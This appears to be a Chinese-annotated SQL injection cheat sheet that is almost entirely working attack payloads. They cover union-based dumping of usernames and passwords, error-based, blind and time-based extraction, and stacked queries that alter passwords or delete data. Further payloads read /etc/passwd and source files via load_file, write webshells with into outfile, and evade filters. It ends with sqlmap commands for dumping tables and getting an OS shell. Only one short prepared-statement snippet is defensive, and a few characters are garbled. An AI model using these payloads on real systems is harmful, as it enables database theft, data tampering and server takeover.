?id=1 and 1=1    正常
?id=1 and 1=2    异常

?id=1' and '1'='1   正常
?id=1' and '1'='2   异常

?id=1') and ('1')=('1
?id=1')) and (('1'))=(('1
?id=1" and "1"="1
?id=1\  # 转义测试

order by 1--+
order by 2--+

order by n--+  # 递增n直到出错

?id=-1 union select 1,2,3,4,5--+

union select version(),database(),user(),@@version_compile_os--+

union select 1,group_concat(schema_name),3 from information_schema.schemata--+

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

union select 1,group_concat(username,':',password),3 from users--+

and updatexml(1,concat(0x7e,(select user()),0x7e),1)--+

and extractvalue(1,concat(0x7e,(select user())))--+

and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

and geometrycollection((select * from(select * from(select user())a)b))--+
and multipoint((select * from(select * from(select user())a)b))--+
and polygon((select * from(select * from(select user())a)b))--+

and ascii(substr((select database()),1,1))>100--+

and ascii(substr((select database()),1,1)) between 97 and 122--+

and (select database()) regexp '^[a-z]'--+
and (select database()) regexp '^a'--+

and (select database()) like 'a%'--+

and if(ascii(substr(database(),1,1))>100,sleep(5),0)--+

and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.columns C)--+

and (select pg_sleep(5) from pg_class limit 1)--+

and (SELECT count(*) FROM information_schema.columns A, information_schema.columns B)--+

?id=1; select if(sub(database(),1,1)='a',sleep(3),0)--+
?query=1; CREATE TABLE test (data VARCHAR(100));
?query=1; INSERT INTO test VALUES ('test');
?query=1; DELETE FROM test;
?id=1; update users set password='newpass' where id=1--+

union select 1,load_file('/etc/passwd'),3--+
union select 1,hex(load_file('/var/www/html/index.php')),3--+  # 读取PHP源码

union select 1,"[WEBSHELL_PAYLOAD_REMOVED_FOR_SECURITY]",3 into outfile '/var/www/html/shell.php'--+
union select 1,"[WEBSHELL_PAYLOAD_REMOVED_FOR_SECURITY]",3 into dumpfile '/var/www/html/shell.php'--+

uni/**/on sele/**/ct 1,2,3--+
/**!union*/ /**!select*/ 1,2,3--+

UnIoN SeLeCt 1,2,3--+

UNUNIONION SELSELECTECT 1,2,3--+
anandd 1=1--+

十六进制: 0x7573657273 (users)
宽字节: %df\x27 (GBK编码)

substr() → substring() / mid()
ascii() → ord()
sleep() → benchmark()
@@datadir → @@tmpdir

?id=1&id=2&id=3  # 不同中间件取最后一个或第一个参数
?id=1/**&id=-1 union select 1,2,3--+  # Apache取最后一个

// Java示例
String sql = "SELECT * FROM users WHERE id = ?";
PreparedStatement pstmt = conn.prepareStatement(sql);
pstmt.setInt(1, id);
ResultSet rs = pstmt.executeQuery();

 基础检测
sqlmap -u "http://target.com/page?id=1"

# 获取数据库
sqlmap -u "http://target.com/page?id=1" --dbs

# 获取�R
sqlmap -u "http://target.com/page?id=1" -D database_name --tables

# 获取数据
sqlmap -u "http://target.com/page?id=1" -D database_name -T users --dump

# 带Cookie
sqlmap -u "http://target.com/page?id=1" --cookie="PHPSESSID=abc123"

# POST请求
sqlmap -u "http://target.com/page" --data="username=admin&password=123"

# 指定注入点
sqlmap -u "http://target.com/page?id=1*"

# 等级和飊险
sqlmap -u "http://target.com/page?id=1" --level=3 --risk=2

# 批量检测
sqlmap -m urls.txt

# 获取shell
sqlmap -u "http://target.com/page?id=1" --os-shell